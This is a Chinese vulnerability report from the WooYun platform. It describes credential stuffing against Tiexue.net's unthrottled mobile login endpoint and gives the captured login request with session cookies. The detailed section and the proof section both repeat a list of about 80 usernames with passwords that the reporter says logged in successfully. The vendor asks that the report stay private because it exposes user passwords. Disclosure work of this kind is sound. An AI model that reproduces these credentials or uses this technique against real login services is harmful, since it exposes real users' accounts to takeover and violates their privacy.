当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133048

漏洞标题:铁血网手机登陆接口设计不当可撞库用户(成功账号证明)

相关厂商:北京铁血科技

漏洞作者: 路人甲

提交时间:2015-08-10 14:15

修复时间:2015-09-24 17:36

公开时间:2015-09-24 17:36

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经确认,细节仅向厂商公开
2015-08-20: 细节向核心白帽子及相关领域专家公开
2015-08-30: 细节向普通白帽子公开
2015-09-09: 细节向实习白帽子公开
2015-09-24: 细节向公众公开

简要描述:

铁血网手机登陆接口设计不当可撞库用户(成功账号证明)

详细说明:

http://m.tiexue.net/touch/Login.aspx这个接口是铁血网手机登陆接口,发现登陆处未做登陆限制

1.png


然后抓取post数据包如下:

POST /touch/loginMessage.aspx HTTP/1.1
Host: m.tiexue.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.tiexue.net/touch/Login.aspx
Cookie: bd_close_u1671441=1; ASP.NET_SessionId=qu4tdjavxkmaj2qiwtvbiyrz; Hm_lvt_1c4e211c635223e4b12f4bb75590975a=1439175402; Hm_lpvt_1c4e211c635223e4b12f4bb75590975a=1439186283; cid=JYODNHBL; loginfail=2; _testrefer=sousuo; __utma=247579266.1901801480.1439185862.1439185862.1439185862.1; __utmc=247579266; __utmz=247579266.1439185862.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; Hm_lvt_c8d128c127cc299c41e73a24f1158b7c=1439175977,1439175980,1439185863; Hm_lpvt_c8d128c127cc299c41e73a24f1158b7c=1439185863; _logck=62A555EB343B579FC522F1B09FD46B6B; BAIDU_DUP_lcr=http://www.baidu.com/link?url=QzWm9pZBGMSJsOyhNEJ2n0tCyT_bKKG-6QvF44Gz1Ty&wd=&eqid=cb7b3ea200019e4e0000000455c83bbe; __utmb=247579266.1.10.1439185862; __utmt=1; __utmv=247579266.|1=loginuser=0=1; Hm_lvt_46453248db73201f248f3cab8fe9b1ce=1439185965; Hm_lpvt_46453248db73201f248f3cab8fe9b1ce=1439186056; checkstatus=%7b%22code%22%3a1%2c%22msg%22%3a%22%e7%ad%be%e5%88%b0%e6%88%90%e5%8a%9f%22%2c%22rank%22%3a4093%2c%22keepdays%22%3a1%7d
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
username=aaaaaaaaa&password=aaaaaaaaa


发现用户名和密码都是明文传输的,然后去撞库试试,判断可以撞库成功

3.png


成功用户证明:

yang	123456789	1084
132	123456	1086
gueic	my760603	1088
drac	wangzhen	1088
1111q	111111	1090
stinfo	stinfo	1090
axjlf	aaaaaa	1090
514631	514631	1092
kicker	wxwxwx	1092
zcywd	wszcywd	1092
262626	123456	1092
zcyfz	zcy6215	1092
hc530	8497490539	1092
yida7	88224466	1092
shegang	3405005	1094
pyxwyl	wanglang2l	1094
wszdszg	7412369	1094
jushengl	js558a6	1094
wszdszg	7412369	1094
xxjj121	123456	1094
wap123	123456	1094
dtempler	840311	1094
6158153	6158153	1096
17880866	1518591	1096
a3220cs	2373868	1096
lujinww	86302230	1096
cxbszsd	617815	1096
9413737	3344520	1096
mnz1230	xuweiwei	1096
chxd168	19891104	1096
1235874	123456	1096
east701	zhang880915	1096
musicmh	511323	1096
sky2012	china2012	1096
vik2008	211314	1096
lydxyyq	1981422	1096
wanyukan	5201314	1098
xtreecho	xiaoqiang	1098
nvslgogo	nvslgogo	1098
86784336	850210	1098
46228306	840920	1098
lindxxxx	966646	1098
mosco730	yjrgmiqpl	1098
45132169	123123	1098
51859327	123456zj	1098
baby20yu	870204	1098
44553747	412369	1098
12451245	123456	1098
liubin39	19860309	1098
peiroger	826527	1098
409064382	23534192	1100
584010975	521827	1100
364161489	364161	1100
zhaoziyan	123456	1100
260266603	2612581	1100
423157489	8866965	1100
jianle001	595961957	1100
254561695	5904813	1100
408343294	1991227	1100
122134179	159456753	1100
124819975	124819975	1100
597564337	68193875	1100
505414861	a5190172	1100
516939496	19870401	1100
410337573	123456	1100
326441269	326441269	1100
125045081	123456	1100
250884292	200862132	1100
myskyfoot	19860603	1100
644087187	asdasdasd	1100
370185602	19890111	1100
296463270	19880314	1100
153715388	xwei20140	1100
xiaoma3000	xiaoma3000	1102
xiaoxuejun	991397	1102
zuoyouzhua	woshihaozi	1102
hp74948383	hp123123	1102
kemeijin886	66980276	1104
tonypourquoi	2998755ty	1104
gechenglimei	19780615	1106
gechenglimei	19780615	1106


登陆成功咯~看看都是老用户,而且还有经验不少~

4.png


5.png


6.png

漏洞证明:

http://m.tiexue.net/touch/Login.aspx这个接口是铁血网手机登陆接口,发现登陆处未做登陆限制

1.png


然后抓取post数据包如下:

POST /touch/loginMessage.aspx HTTP/1.1
Host: m.tiexue.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.tiexue.net/touch/Login.aspx
Cookie: bd_close_u1671441=1; ASP.NET_SessionId=qu4tdjavxkmaj2qiwtvbiyrz; Hm_lvt_1c4e211c635223e4b12f4bb75590975a=1439175402; Hm_lpvt_1c4e211c635223e4b12f4bb75590975a=1439186283; cid=JYODNHBL; loginfail=2; _testrefer=sousuo; __utma=247579266.1901801480.1439185862.1439185862.1439185862.1; __utmc=247579266; __utmz=247579266.1439185862.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; Hm_lvt_c8d128c127cc299c41e73a24f1158b7c=1439175977,1439175980,1439185863; Hm_lpvt_c8d128c127cc299c41e73a24f1158b7c=1439185863; _logck=62A555EB343B579FC522F1B09FD46B6B; BAIDU_DUP_lcr=http://www.baidu.com/link?url=QzWm9pZBGMSJsOyhNEJ2n0tCyT_bKKG-6QvF44Gz1Ty&wd=&eqid=cb7b3ea200019e4e0000000455c83bbe; __utmb=247579266.1.10.1439185862; __utmt=1; __utmv=247579266.|1=loginuser=0=1; Hm_lvt_46453248db73201f248f3cab8fe9b1ce=1439185965; Hm_lpvt_46453248db73201f248f3cab8fe9b1ce=1439186056; checkstatus=%7b%22code%22%3a1%2c%22msg%22%3a%22%e7%ad%be%e5%88%b0%e6%88%90%e5%8a%9f%22%2c%22rank%22%3a4093%2c%22keepdays%22%3a1%7d
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
username=aaaaaaaaa&password=aaaaaaaaa


发现用户名和密码都是明文传输的,然后去撞库试试,判断可以撞库成功

3.png


成功用户证明:

yang	123456789	1084
132	123456	1086
gueic	my760603	1088
drac	wangzhen	1088
1111q	111111	1090
stinfo	stinfo	1090
axjlf	aaaaaa	1090
514631	514631	1092
kicker	wxwxwx	1092
zcywd	wszcywd	1092
262626	123456	1092
zcyfz	zcy6215	1092
hc530	8497490539	1092
yida7	88224466	1092
shegang	3405005	1094
pyxwyl	wanglang2l	1094
wszdszg	7412369	1094
jushengl	js558a6	1094
wszdszg	7412369	1094
xxjj121	123456	1094
wap123	123456	1094
dtempler	840311	1094
6158153	6158153	1096
17880866	1518591	1096
a3220cs	2373868	1096
lujinww	86302230	1096
cxbszsd	617815	1096
9413737	3344520	1096
mnz1230	xuweiwei	1096
chxd168	19891104	1096
1235874	123456	1096
east701	zhang880915	1096
musicmh	511323	1096
sky2012	china2012	1096
vik2008	211314	1096
lydxyyq	1981422	1096
wanyukan	5201314	1098
xtreecho	xiaoqiang	1098
nvslgogo	nvslgogo	1098
86784336	850210	1098
46228306	840920	1098
lindxxxx	966646	1098
mosco730	yjrgmiqpl	1098
45132169	123123	1098
51859327	123456zj	1098
baby20yu	870204	1098
44553747	412369	1098
12451245	123456	1098
liubin39	19860309	1098
peiroger	826527	1098
409064382	23534192	1100
584010975	521827	1100
364161489	364161	1100
zhaoziyan	123456	1100
260266603	2612581	1100
423157489	8866965	1100
jianle001	595961957	1100
254561695	5904813	1100
408343294	1991227	1100
122134179	159456753	1100
124819975	124819975	1100
597564337	68193875	1100
505414861	a5190172	1100
516939496	19870401	1100
410337573	123456	1100
326441269	326441269	1100
125045081	123456	1100
250884292	200862132	1100
myskyfoot	19860603	1100
644087187	asdasdasd	1100
370185602	19890111	1100
296463270	19880314	1100
153715388	xwei20140	1100
xiaoma3000	xiaoma3000	1102
xiaoxuejun	991397	1102
zuoyouzhua	woshihaozi	1102
hp74948383	hp123123	1102
kemeijin886	66980276	1104
tonypourquoi	2998755ty	1104
gechenglimei	19780615	1106
gechenglimei	19780615	1106


登陆成功咯~看看都是老用户,而且还有经验不少~

4.png


5.png


6.png

修复方案:

加验证码机制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-10 17:35

厂商回复:

已经修复,但是由于涉及用户密码,能否要求不公开

最新状态:

2015-09-21:添加服务器登录次数限制